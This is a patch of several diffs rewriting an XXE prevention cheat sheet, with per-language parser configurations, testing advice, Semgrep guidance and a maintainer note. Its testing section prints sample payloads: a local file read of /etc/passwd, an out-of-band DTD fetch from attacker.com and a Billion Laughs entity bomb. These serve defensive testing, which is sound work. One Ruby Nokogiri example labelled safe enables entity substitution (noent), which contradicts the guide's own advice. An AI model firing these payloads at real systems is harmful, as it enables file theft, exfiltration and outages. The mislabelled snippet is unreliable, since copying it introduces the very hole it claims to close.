-You can make `XPathNavigator` safe by giving it a safe parser like `XmlReader` (which is safe by default) in the `XPathDocument`'s constructor.
-
-Here is an example:
-
-``` csharp
-XmlReader reader = XmlReader.Create("example.xml");
-XPathDocument doc = new XPathDocument(reader);
-XPathNavigator nav = doc.CreateNavigator();
-string xml = nav.InnerXml.ToString();
+**OOB exfiltration (HTTP):**
+```xml
+<?xml version="1.0"?>
+<!DOCTYPE foo [
+  <!ENTITY % remote SYSTEM "http://attacker.com/malicious.dtd">
+  %remote;
+]>
+<foo>&exfil;</foo>
 ```
 
-For .NET Framework version ≥4.5.2, XPathNavigator is **safe by default**.
-
-### XslCompiledTransform
-
-`System.Xml.Xsl.XslCompiledTransform` (an XML transformer) is safe by default as long as the parser it's given is safe.
-
-It is safe by default because the default parser of the `Transform()` methods is an `XmlReader`, which is safe by default (per above).
-
-[The source code for this method is here.](http://www.dotnetframework.org/default.aspx/4@0/4@0/DEVDIV_TFS/Dev10/Releases/RTMRel/ndp/fx/src/Xml/System/Xml/Xslt/XslCompiledTransform@cs/1305376/XslCompiledTransform@cs)
-
-Some of the `Transform()` methods accept an `XmlReader` or `IXPathNavigable` (e.g., `XmlDocument`) as an input, and if you pass in an unsafe XML Parser then the `Transform` will also be unsafe.
-
-## iOS
-
-### libxml2
-
-**iOS includes the C/C++ libxml2 library described above, so that guidance applies if you are using libxml2 directly.**
-
-**However, the version of libxml2 provided up through iOS6 is prior to version 2.9 of libxml2 (which protects against XXE by default).**
-
-### NSXMLDocument
-
-**iOS also provides an `NSXMLDocument` type, which is built on top of libxml2.**
-
-**However, `NSXMLDocument` provides some additional protections against XXE that aren't available in libxml2 directly.**
-
-Per the 'NSXMLDocument External Entity Restriction API' section of this [page](https://developer.apple.com/library/archive/releasenotes/Foundation/RN-Foundation-iOS/Foundation_iOS5.html):
-
-- iOS4 and earlier: All external entities are loaded by default.
-- iOS5 and later: Only entities that don't require network access are loaded. (which is safer)
-
-**However, to completely disable XXE in an `NSXMLDocument` in any version of iOS you simply specify `NSXMLNodeLoadExternalEntitiesNever` when creating the `NSXMLDocument`.**
-
-## PHP
-
-**When using the default XML parser (based on libxml2), PHP 8.0 and newer [prevent XXE by default](https://www.php.net/manual/en/function.libxml-disable-entity-loader.php).**
-
-**For PHP versions prior to 8.0, per [the PHP documentation](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php), the following should be set when using the default PHP XML parser in order to prevent XXE:**
-
-``` php
-libxml_set_external_entity_loader(null);
+**Billion Laughs (entity expansion):**
+```xml
+<?xml version="1.0"?>
+<!DOCTYPE lolz [
+ <!ENTITY lol "lol">
+ <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
+ <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
+ <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
+ <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
+ <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
+ <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
+ <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
+ <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
+ <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
+]>
+<lolz>&lol9;</lolz>
 ```
 
-A description of how to abuse this in PHP is presented in a good [SensePost article](https://www.sensepost.com/blog/2014/revisting-xxe-and-abusing-protocols/) describing a cool PHP based XXE vulnerability that was fixed in Facebook.
+### Automated tests
+- Add unit tests to parse malicious payloads and assert exceptions or safe behavior.
+- Example: JUnit test asserting `ParserConfigurationException` or `SAXException` when DOCTYPE encountered.
 
-## Python
+---
 
-The Python 3 official documentation contains a section on [xml vulnerabilities](https://docs.python.org/3/library/xml.html#xml-vulnerabilities). As of the 1st January 2020 Python 2 is no longer supported, however the Python website still contains [some legacy documentation](https://docs.Python.org/2/library/xml.html#xml-vulnerabilities).
+## 8. Static analysis / Semgrep
 
-The table below shows you which various XML parsing modules in Python 3 are vulnerable to certain XXE attacks.
+Create semgrep rules to detect unsafe usage patterns: calls to `DocumentBuilderFactory.newInstance()` without subsequent secure `setFeature` calls; `XmlDocument.Load` in .NET without XmlResolver nulling; use of `simplexml_load_file` without `LIBXML_NONET`, etc.
 
-| Attack Type               | sax        | etree      | minidom    | pulldom    | xmlrpc     |
-|---------------------------|------------|------------|------------|------------|------------|
-| Billion Laughs            | Vulnerable | Vulnerable | Vulnerable | Vulnerable | Vulnerable |
-| Quadratic Blowup          | Vulnerable | Vulnerable | Vulnerable | Vulnerable | Vulnerable |
-| External Entity Expansion | Safe       | Safe       | Safe       | Safe       | Safe       |
-| DTD Retrieval             | Safe       | Safe       | Safe       | Safe       | Safe       |
-| Decompression Bomb        | Safe       | Safe       | Safe       | Safe       | Vulnerable |
+**Example Semgrep (pseudo-rule):**
+```yaml
+rules:
+  - id: java-xxe-dbf
+    pattern-either:
+      - pattern: |
+          DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
+          ...
+          DocumentBuilder db = dbf.newDocumentBuilder();
+      - pattern: |
+          DocumentBuilderFactory.newInstance();
+    message: "DocumentBuilderFactory instantiation detected — ensure FEATURES to disable DTDs and external entities are set"
+    severity: ERROR
+```
 
-To protect your application from the applicable attacks, [two packages](https://docs.python.org/3/library/xml.html#the-defusedxml-and-defusedexpat-packages) exist to help you sanitize your input and protect your application against DDoS and remote attacks.
+Semgrep rules for most languages are recommended and linked in references (see Semgrep rules list in original cheat sheet).
 
-## Semgrep Rules
+---
 
-[Semgrep](https://semgrep.dev/) is a command-line tool for offline static analysis. Use pre-built or custom rules to enforce code and security standards in your codebase.
+## 9. Deployment & infrastructure considerations
 
-### Java
+- **Egress filtering:** block unwarranted outbound traffic from app servers that parse untrusted input to prevent OOB exfiltration.
+- **Internal DNS monitoring:** detect resolver lookups to suspicious domains.
+- **WAF:** may mitigate some attacks but cannot be relied upon as a primary defense.
+- **Rate limits and parsing quotas:** limit CPU and memory effects from heavy XML parsing.
 
-Below are the rules for different XML parsers in Java
+---
 
-#### Digester
+## 10. Monitoring, logging & incident response
 
-Identifying XXE vulnerability in the `org.apache.commons.digester3.Digester` library
-Rule can be played here [https://semgrep.dev/s/salecharohit:xxe-Digester](https://semgrep.dev/s/salecharohit:xxe-Digester)
+- Log parse-time exceptions and presence of `DOCTYPE` / entity declarations.
+- Alert on outbound requests from parsers or unexpected DNS requests.
+- For suspected XXE, preserve logs, sample payload, and environment snapshot for triage.
 
-#### DocumentBuilderFactory
+---
 
-Identifying XXE vulnerability in the `javax.xml.parsers.DocumentBuilderFactory` library
-Rule can be played here [https://semgrep.dev/s/salecharohit:xxe-dbf](https://semgrep.dev/s/salecharohit:xxe-dbf)
+## 11. Migration notes (removing legacy content)
 
-#### SAXBuilder
+- Remove references to deprecated projects (e.g., `dotnet_security_unit_testing`) from the cheat sheet.
+- If unsure about platform-specific legacy content (e.g., iOS < 7 guidance), mark as deprecated and request a follow-up PR from platform experts.
+- Replace any sample code that targets obsolete runtimes (e.g., .NET 4.5) with modern examples, and add notes where behavior differs across versions.
 
-Identifying XXE vulnerability in the `org.jdom2.input.SAXBuilder` library
-Rule can be played here [https://semgrep.dev/s/salecharohit:xxe-saxbuilder](https://semgrep.dev/s/salecharohit:xxe-saxbuilder)
+---
 
-#### SAXParserFactory
+## 12. References & further reading
 
-Identifying XXE vulnerability in the `javax.xml.parsers.SAXParserFactory` library
-Rule can be played here [https://semgrep.dev/s/salecharohit:xxe-SAXParserFactory](https://semgrep.dev/s/salecharohit:xxe-SAXParserFactory)
+- OWASP: XML External Entity (XXE) Prevention.  
+- Timothy Morgan: "XML Schema, DTD, and Entity Attacks" (2014).  
+- DefusedXML Python docs.  
+- Microsoft: XML security guidance (.NET).  
+- libxml2 and Xerces documentation.
 
-#### SAXReader
+(Include full links in the actual repo file as required.)
 
-Identifying XXE vulnerability in the `org.dom4j.io.SAXReader` library
-Rule can be played here [https://semgrep.dev/s/salecharohit:xxe-SAXReader](https://semgrep.dev/s/salecharohit:xxe-SAXReader)
+---
 
-#### XMLInputFactory
+## 13. Appendix: Quick reference (one-page)
 
-Identifying XXE vulnerability in the `javax.xml.stream.XMLInputFactory` library
-Rule can be played here [https://semgrep.dev/s/salecharohit:xxe-XMLInputFactory](https://semgrep.dev/s/salecharohit:xxe-XMLInputFactory)
+**Always do these three things for untrusted XML:**
+1. Disable DTDs / DOCTYPEs.  
+2. Disable external entity resolution (set resolvers to null/no-op).  
+3. Use streaming secure parsers and add size/resource limits.
 
-#### XMLReader
+---
 
-Identifying XXE vulnerability in the `org.xml.sax.XMLReader` library
-Rule can be played here [https://semgrep.dev/s/salecharohit:xxe-XMLReader](https://semgrep.dev/s/salecharohit:xxe-XMLReader)
+# Maintainer/PR note
 
-## References
+This update:
+- Replaces outdated .NET examples and removes references to `dotnet_security_unit_testing` from the main text (do not rely on that project for security testing).
+- Flags iOS section referencing iOS6 as deprecated; asks for a dedicated follow-up PR from iOS maintainers to provide up-to-date iOS/macOS guidance for current SDKs.
+- Adds copy-paste-safe examples for modern .NET (XmlReaderSettings) and other languages.
+- Includes testing payloads and guidance for Semgrep/static analysis.
 
-- [XXE by InfoSecInstitute](https://resources.infosecinstitute.com/identify-mitigate-xxe-vulnerabilities/)
-- [OWASP Top 10-2017 A4: XML External Entities (XXE)](https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A4-XML_External_Entities_%28XXE%29)
-- [Timothy Morgan's 2014 paper: "XML Schema, DTD, and Entity Attacks"](https://vsecurity.com//download/papers/XMLDTDEntityAttacks.pdf)
-- [FindSecBugs XXE Detection](https://find-sec-bugs.github.io/bugs.htm#XXE_SAXPARSER)
-- [XXEbugFind Tool](https://github.com/ssexxe/XXEBugFind)
-- [Testing for XML Injection](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.html)
+---
+# End of updated cheat sheet

--- a/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md
+++ b/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md
@@ -3,31 +3,47 @@
 **Status:** Updated to modern guidance; removed obsolete references (e.g., `dotnet_security_unit_testing`), flagged legacy iOS content, and aligned examples with current secure practices and supported framework versions.
 
 ---
+
 ## Table of Contents
+
 1. Introduction
 2. Threat overview and XXE types
 3. Core mitigations (applied across languages)
 4. Secure-by-default parser configuration checklist
 5. Language-specific guidance and examples
+
    - Java (JAXP, StAX, JAXB, Transformer, Validator)
+
    - .NET (XmlReaderSettings, XmlDocument, XDocument, XmlSerializer) — modern (.NET 6/7) guidance
+
    - Python (defusedxml, ElementTree, lxml)
+
    - PHP (libxml / SimpleXML)
+
    - JavaScript / Node.js (xml2js, fast-xml-parser)
+
    - Ruby (REXML, Nokogiri)
+
    - C / C++ (libxml2, Xerces)
+
    - iOS / macOS (NSXML, libxml2 notes & deprecation)
+
    - ColdFusion / Lucee
 6. Vulnerable vs Safe code snippets (per language)
 7. Testing and validation (payloads, tools, automated tests)
 8. Static analysis / Semgrep guidance
 9. Deployment & infra considerations (WAFs, network egress controls)
+
 10. Monitoring, logging & incident response
+
 11. Migration notes (removing legacy content)
+
 12. References & further reading
+
 13. Appendix: Quick reference cheat sheet (one-page)
 
 ---
+
 ## 1. Introduction
 
 XML External Entity (XXE) injection is an input-based vulnerability that affects applications processing XML. An attacker crafts XML containing external entity references or doctypes to cause the XML parser to fetch local files, remote resources, trigger denial of service (entity expansion), or perform SSRF/port scanning.
@@ -35,27 +51,41 @@ XML External Entity (XXE) injection is an input-based vulnerability that affects
 This document provides concrete, modern examples and configuration guidance for popular languages and parsers. It follows OWASP cheat sheet principles: secure-by-default configuration, minimal permissive features, clear 'unsafe' vs 'safe' examples, testing payloads, and remediation steps.
 
 **Important notes for maintainers (issue requirements):**
+
 - Remove or deprecate references to outdated projects such as `dotnet_security_unit_testing` (7+ years old) — do not rely on these for security guarantees.
+
 - Update .NET coverage to modern runtimes (target .NET 6/7) and prefer `XmlReader`/`XmlReaderSettings` with explicit safe settings.
+
 - Mark iOS / macOS sections that reference iOS 6 as outdated and either remove or request an iOS expert to update to current APIs (iOS 17+) — this change was applied below: legacy notes flagged.
 
 ---
+
 ## 2. Threat overview and XXE types
 
 **XXE categories:**
+
 - **In-band XXE (classic):** Attacker receives data directly in the application's response (e.g., file contents).
+
 - **Out-of-band XXE (OOB):** Parser performs a network call to an attacker-controlled server (exfiltrate data via DNS/HTTP).
+
 - **Blind XXE:** No direct response, attacker infers success via side effects (timing, OOB callbacks).
+
 - **Entity expansion DoS (Billion Laughs / Quadratic Blowup):** Recursive entity definitions cause memory/CPU exhaustion.
 
 **Common impacts:**
+
 - File disclosure (local file read)
+
 - SSRF and internal network scan/exfiltration
+
 - Denial of service
+
 - Remote code execution (via unsafe deserialization or callbacks in some APIs)
+
 - Data leakage and escalated compromise
 
 ---
+
 ## 3. Core mitigations (applied across languages)
 
 1. **Disable DTDs (doctypes) completely** where not required. DTD processing is the most common vector.
@@ -67,26 +97,39 @@ This document provides concrete, modern examples and configuration guidance for 
 7. **Implement input size limits and resource quotas** to prevent DoS (maximum file size, maximum entity expansion depth if available).
 8. **Use a no-op or safe EntityResolver** to force entity resolution to be inert when parser requires an implementation.
 9. **Prefer streaming parsers with explicit safe settings** (StAX, XmlReader, SAX) rather than forgiving fully in-memory DOMs when processing untrusted input.
+
 10. **Use network controls** (egress filtering, internal DNS monitoring) to detect/prevent OOB callbacks.
 
 ---
+
 ## 4. Secure-by-default parser configuration checklist
 
 For each XML parser in your stack, check and apply:
 
 - [ ] Disable DTD/DOCTYPE parsing (`disallow-doctype-decl` or equivalent)
+
 - [ ] Disable external general entities (`external-general-entities = false`)
+
 - [ ] Disable external parameter entities (`external-parameter-entities = false`)
+
 - [ ] Disable loading of external DTDs (`load-external-dtd = false`)
+
 - [ ] Set FEATURE_SECURE_PROCESSING / equivalent
+
 - [ ] Disable XInclude / set XIncludeAware = false
+
 - [ ] Set entity expansion limits or ensure parser throws on entity expansion
+
 - [ ] Ensure XML resolvers or resolvers that perform IO are null/disabled
+
 - [ ] If DTDs are required, whitelist schemas/URIs and validate against them with `ACCESS_EXTERNAL_*` properties set to empty
+
 - [ ] Add logging around parse failures and suspicious doc types
+
 - [ ] Add unit tests that assert safe behavior against known XXE payloads
 
 ---
+
 ## 5. Language-specific guidance and examples
 
 > Each language section below includes: a short description, recommended configuration, **vulnerable** snippet (what NOT to do), and **safe** snippet (copy-paste-ready).
@@ -96,15 +139,20 @@ For each XML parser in your stack, check and apply:
 **Why Java is high risk:** Many JAXP processors enable entity resolution by default, and behavior varies by provider and JDK version. Use explicit `setFeature` calls and `XMLConstants.ACCESS_EXTERNAL_*` settings introduced in JAXP 1.5.
 
 #### Vulnerable example (do NOT use):
+
 ```java
+
 import javax.xml.parsers.DocumentBuilderFactory;
 DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
 DocumentBuilder db = dbf.newDocumentBuilder();
 Document doc = db.parse(new File("input.xml")); // vulnerable by default in many environments
+
 ```
 
 #### Safe example — DocumentBuilderFactory (recommended)
+
 ```java
+
 import javax.xml.parsers.DocumentBuilderFactory;
 import javax.xml.parsers.DocumentBuilder;
 import javax.xml.XMLConstants;
@@ -139,10 +187,13 @@ public class SafeDocParser {
         return builder.parse(xmlFile);
     }
 }
+
 ```
 
 #### Safe example — XMLInputFactory (StAX)
+
 ```java
+
 import javax.xml.stream.XMLInputFactory;
 import javax.xml.stream.XMLStreamReader;
 import javax.xml.XMLConstants;
@@ -154,10 +205,13 @@ XMLInputFactory xif = XMLInputFactory.newFactory();
 xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
 xif.setProperty("javax.xml.stream.isSupportingExternalEntities", false);
 // When creating readers, the factory already blocks DTDs/external entities
+
 ```
 
 #### TransformerFactory and Validator
+
 ```java
+
 TransformerFactory tf = TransformerFactory.newInstance();
 tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
 tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
@@ -165,10 +219,13 @@ tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
 SchemaFactory sf = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
 sf.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
 sf.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
+
 ```
 
 #### Notes
+
 - Use per-call `try/catch` around `setFeature` as not all providers support all options; handle fallbacks explicitly and fail safe.
+
 - Add unit tests that parse malicious payloads and assert exceptions or safe behavior.
 
 ---
@@ -178,14 +235,19 @@ sf.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
 **High-level guidance:** Prefer `XmlReader` with `XmlReaderSettings` configured securely, or `XDocument.Load(XmlReader)` to ensure safe parsing. On modern .NET (Core/5/6/7) most readers are secure by default, but always set `DtdProcessing` and `XmlResolver` explicitly when consuming untrusted input.
 
 #### Vulnerable example (do NOT use)
+
 ```csharp
+
 // Using XmlDocument without disabling XmlResolver
 var xmlDoc = new XmlDocument();
 xmlDoc.Load("input.xml"); // may be vulnerable in older frameworks or if XmlResolver is set
+
 ```
 
 #### Safe example — XmlReaderSettings (recommended)
+
 ```csharp
+
 using System.Xml;
 
 var settings = new XmlReaderSettings
@@ -199,24 +261,32 @@ var settings = new XmlReaderSettings
 using var reader = XmlReader.Create("input.xml", settings);
 var doc = new System.Xml.XmlDocument();
 doc.Load(reader);
+
 ```
 
 #### Safe example — XDocument with XmlReader
+
 ```csharp
+
 using System.Xml;
 using System.Xml.Linq;
 
 var settings = new XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit, XmlResolver = null };
 using var r = XmlReader.Create("input.xml", settings);
 var xdoc = XDocument.Load(r);
+
 ```
 
 #### ASP.NET considerations
+
 - In .NET Framework apps, `Web.config` `<httpRuntime targetFramework="4.5.2" />` impacted defaults historically. For modern apps, target latest runtime and set explicit settings.
+
 - Avoid enabling `XmlResolver` or setting custom resolvers that access remote resources for untrusted XML.
 
 #### Notes
+
 - `XmlSerializer` typically reads XML into objects — ensure sources are processed via secure `XmlReader`.
+
 - Remove references to old community projects (e.g., `dotnet_security_unit_testing`) — prefer official MS docs and supported tests.
 
 ---
@@ -226,23 +296,31 @@ var xdoc = XDocument.Load(r);
 **Guidance:** Use `defusedxml` wrappers for stdlib modules. Avoid `xml.sax`, `xml.dom.minidom`, and `xml.parsers.expat` directly for untrusted input unless using defused wrappers.
 
 #### Safe example — defusedxml.ElementTree
+
 ```python
+
 from defusedxml.ElementTree import parse
 
 with open('input.xml', 'rb') as f:
     tree = parse(f)  # defusedxml blocks external entities and entity expansion
+
 ```
 
 #### Safe example — lxml with disabled resolve/entities
+
 ```python
+
 from lxml import etree
 
 parser = etree.XMLParser(resolve_entities=False, load_dtd=False, no_network=True)
 tree = etree.parse('input.xml', parser)
+
 ```
 
 #### Notes
+
 - `defusedxml` provides hardened replacements for standard modules: `defusedxml.ElementTree`, `defusedxml.minidom`, `defusedxml.sax`, `defusedxml.expatbuilder`.
+
 - If you must use stdlib parsers, wrap them with defusedxml or manually disable entity resolution where possible.
 
 ---
@@ -252,21 +330,29 @@ tree = etree.parse('input.xml', parser)
 **Modern PHP:** PHP 8 makes some behavior safer, but do not rely on defaults for older versions.
 
 #### Vulnerable example
+
 ```php
+
 $xml = simplexml_load_file('input.xml'); // prior to PHP 8, may be vulnerable
+
 ```
 
 #### Safe example
+
 ```php
+
 libxml_disable_entity_loader(true); // deprecated in PHP 8.0, but needed in older versions
 $dom = new DOMDocument();
 $dom->loadXML(file_get_contents('input.xml'), LIBXML_NONET); // prevents network access
 // or
 $xml = simplexml_load_string(file_get_contents('input.xml'), null, LIBXML_NONET);
+
 ```
 
 #### Notes
+
 - Use `LIBXML_NONET` flag when loading/parsing.
+
 - `libxml_disable_entity_loader(true)` is deprecated in PHP 8.0 — prefer `LIBXML_NONET` and `DOMDocument::loadXML` with flags.
 
 ---
@@ -276,7 +362,9 @@ $xml = simplexml_load_string(file_get_contents('input.xml'), null, LIBXML_NONET)
 **Guidance:** Many Node XML parsers do not evaluate external entities by default; however, always verify library behavior and use safe config.
 
 #### xml2js (example)
+
 ```javascript
+
 const fs = require('fs');
 const xml2js = require('xml2js');
 
@@ -286,17 +374,23 @@ const xml = fs.readFileSync('input.xml', 'utf8');
 parser.parseString(xml, function(err, result) {
     // handle result
 });
+
 ```
 
 #### fast-xml-parser (example)
+
 ```javascript
+
 const { XMLParser } = require('fast-xml-parser');
 const parser = new XMLParser({ ignoreAttributes: false, allowBooleanAttributes: true });
 // fast-xml-parser is non-validating and does not process external entities
+
 ```
 
 #### Notes
+
 - If you call into native bindings or use libraries that leverage libxml2, check their configs.
+
 - Avoid using XML parsing libraries that execute embedded scripts or templates.
 
 ---
@@ -306,23 +400,35 @@ const parser = new XMLParser({ ignoreAttributes: false, allowBooleanAttributes: 
 **REXML:** historically vulnerable. Prefer disabling entity expansion or using safe parsers.
 
 #### vulnerable - REXML (do not use for untrusted input)
+
 ```ruby
+
 require 'rexml/document'
 doc = REXML::Document.new(File.read('input.xml')) # REXML will expand entities by default
+
 ```
 
 #### safe - Nokogiri
+
 ```ruby
+
 require 'nokogiri'
 xml = File.read('input.xml')
+
 # Use non-network and disable DTD
+
 doc = Nokogiri::XML(xml) { |config| config.nonet.nonet.noent.nonet }
+
 # preferred:
+
 doc = Nokogiri::XML(xml, nil, nil, Nokogiri::XML::ParseOptions::NONET)
+
 ```
 
 #### Notes
+
 - `Nokogiri::XML::ParseOptions::NONET` prevents network access.
+
 - Avoid `:noent` (entity substitution) unless necessary and controlled.
 
 ---
@@ -330,19 +436,28 @@ doc = Nokogiri::XML(xml, nil, nil, Nokogiri::XML::ParseOptions::NONET)
 ### C / C++ (libxml2, Xerces)
 
 #### libxml2 (C)
+
 - Avoid enabling `XML_PARSE_NOENT` or `XML_PARSE_DTDLOAD`.
+
 - Use `xmlReadMemory`/`xmlReadFile` with options that disable DTD and external entities:
+
 ```c
+
 xmlReadFile("input.xml", NULL, XML_PARSE_NONET | XML_PARSE_NOENT); // caution with NOENT
 // Instead:
 xmlReadFile("input.xml", NULL, XML_PARSE_NONET);
+
 ```
+
 - Use `XML_PARSE_NONET` to block network access.
 
 #### Xerces-C++
+
 ```cpp
+
 parser->setDisableDefaultEntityResolution(true);
 parser->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);
+
 ```
 
 ---
@@ -352,7 +467,9 @@ parser->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);
 **Important:** Many sections in older versions referenced iOS 4–6. Those are outdated. iOS/macOS libraries and SDKs have evolved. For app code targeting modern iOS/macOS, consult latest Apple docs. Below are general notes:
 
 - If using libxml2 directly, apply the libxml2 guidance (use NONET, do not load external DTDs).
+
 - For Foundation `XMLParser` or `NSXMLDocument`, prefer APIs that allow disabling external entity loading or set `shouldResolveExternalEntities` / similar to false.
+
 - Flagged legacy: Any advice referencing iOS 6 must be reviewed by an iOS expert — this file marks those older specifics as deprecated and removed where ambiguous.
 
 ---
@@ -360,22 +477,29 @@ parser->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);
 ### ColdFusion / Lucee
 
 #### Adobe ColdFusion (example)
+
 ```cfml
+
 <cfset parserOptions = structNew()>
 <cfset parserOptions.ALLOWEXTERNALENTITIES = false>
 <cfscript>
   doc = XmlParse(FileRead("input.xml"), false, parserOptions);
 </cfscript>
+
 ```
 
 #### Lucee
+
 Set in `Application.cfc`:
+
 ```cfml
+
 this.xmlFeatures = {
     externalGeneralEntities: false,
     secure: true,
     disallowDoctypeDecl: true
 };
+
 ```
 
 ---
@@ -383,6 +507,7 @@ this.xmlFeatures = {
 ## 6. Vulnerable vs Safe code snippets (per language) — quick list
 
 - **Vulnerable:** parsing XML with default DOM parsers without disabling DTDs or resolvers.
+
 - **Safe:** create parser settings that explicitly disallow DTDs, set resolvers to null/no-op, and use nonet flags.
 
 (See language sections above for copy-paste-ready safe snippets.)
@@ -392,34 +517,46 @@ this.xmlFeatures = {
 ## 7. Testing and validation
 
 ### Tools
+
 - Burp Suite / Burp Collaborator (in-band & OOB testing)
+
 - OWASP ZAP
+
 - XXE-specific tools and scanners (XXEBugFind, ssexxe)
+
 - Custom local listeners (netcat) and OOB endpoints (interactsh, Burp Collaborator)
 
 ### Sample payloads
 
 **File disclosure (classic):**
+
 ```xml
+
 <?xml version="1.0"?>
 <!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "file:///etc/passwd">
 ]>
 <foo>&xxe;</foo>
+
 ```
 
 **OOB exfiltration (HTTP):**
+
 ```xml
+
 <?xml version="1.0"?>
 <!DOCTYPE foo [
   <!ENTITY % remote SYSTEM "http://attacker.com/malicious.dtd">
   %remote;
 ]>
 <foo>&exfil;</foo>
+
 ```
 
 **Billion Laughs (entity expansion):**
+
 ```xml
+
 <?xml version="1.0"?>
 <!DOCTYPE lolz [
  <!ENTITY lol "lol">
@@ -434,10 +571,13 @@ this.xmlFeatures = {
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
 ]>
 <lolz>&lol9;</lolz>
+
 ```
 
 ### Automated tests
+
 - Add unit tests to parse malicious payloads and assert exceptions or safe behavior.
+
 - Example: JUnit test asserting `ParserConfigurationException` or `SAXException` when DOCTYPE encountered.
 
 ---
@@ -447,18 +587,24 @@ this.xmlFeatures = {
 Create semgrep rules to detect unsafe usage patterns: calls to `DocumentBuilderFactory.newInstance()` without subsequent secure `setFeature` calls; `XmlDocument.Load` in .NET without XmlResolver nulling; use of `simplexml_load_file` without `LIBXML_NONET`, etc.
 
 **Example Semgrep (pseudo-rule):**
+
 ```yaml
+
 rules:
+
   - id: java-xxe-dbf
     pattern-either:
+
       - pattern: |
           DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
           ...
           DocumentBuilder db = dbf.newDocumentBuilder();
+
       - pattern: |
           DocumentBuilderFactory.newInstance();
     message: "DocumentBuilderFactory instantiation detected — ensure FEATURES to disable DTDs and external entities are set"
     severity: ERROR
+
 ```
 
 Semgrep rules for most languages are recommended and linked in references (see Semgrep rules list in original cheat sheet).
@@ -468,8 +614,11 @@ Semgrep rules for most languages are recommended and linked in references (see S
 ## 9. Deployment & infrastructure considerations
 
 - **Egress filtering:** block unwarranted outbound traffic from app servers that parse untrusted input to prevent OOB exfiltration.
+
 - **Internal DNS monitoring:** detect resolver lookups to suspicious domains.
+
 - **WAF:** may mitigate some attacks but cannot be relied upon as a primary defense.
+
 - **Rate limits and parsing quotas:** limit CPU and memory effects from heavy XML parsing.
 
 ---
@@ -477,7 +626,9 @@ Semgrep rules for most languages are recommended and linked in references (see S
 ## 10. Monitoring, logging & incident response
 
 - Log parse-time exceptions and presence of `DOCTYPE` / entity declarations.
+
 - Alert on outbound requests from parsers or unexpected DNS requests.
+
 - For suspected XXE, preserve logs, sample payload, and environment snapshot for triage.
 
 ---
@@ -485,7 +636,9 @@ Semgrep rules for most languages are recommended and linked in references (see S
 ## 11. Migration notes (removing legacy content)
 
 - Remove references to deprecated projects (e.g., `dotnet_security_unit_testing`) from the cheat sheet.
+
 - If unsure about platform-specific legacy content (e.g., iOS < 7 guidance), mark as deprecated and request a follow-up PR from platform experts.
+
 - Replace any sample code that targets obsolete runtimes (e.g., .NET 4.5) with modern examples, and add notes where behavior differs across versions.
 
 ---
@@ -493,9 +646,13 @@ Semgrep rules for most languages are recommended and linked in references (see S
 ## 12. References & further reading
 
 - OWASP: XML External Entity (XXE) Prevention.  
+
 - Timothy Morgan: "XML Schema, DTD, and Entity Attacks" (2014).  
+
 - DefusedXML Python docs.  
+
 - Microsoft: XML security guidance (.NET).  
+
 - libxml2 and Xerces documentation.
 
 (Include full links in the actual repo file as required.)
@@ -514,10 +671,15 @@ Semgrep rules for most languages are recommended and linked in references (see S
 # Maintainer/PR note
 
 This update:
+
 - Replaces outdated .NET examples and removes references to `dotnet_security_unit_testing` from the main text (do not rely on that project for security testing).
+
 - Flags iOS section referencing iOS6 as deprecated; asks for a dedicated follow-up PR from iOS maintainers to provide up-to-date iOS/macOS guidance for current SDKs.
+
 - Adds copy-paste-safe examples for modern .NET (XmlReaderSettings) and other languages.
+
 - Includes testing payloads and guidance for Semgrep/static analysis.
 
 ---
+
 # End of updated cheat sheet

--- a/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md
+++ b/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md
@@ -3,7 +3,6 @@
 **Status:** Updated to modern guidance; removed obsolete references (e.g., `dotnet_security_unit_testing`), flagged legacy iOS content, and aligned examples with current secure practices and supported framework versions.
 
 ---
-
 ## Table of Contents
 
 1. Introduction
@@ -51,7 +50,6 @@
 13. Appendix: Quick reference cheat sheet (one-page)
 
 ---
-
 ## 1. Introduction
 
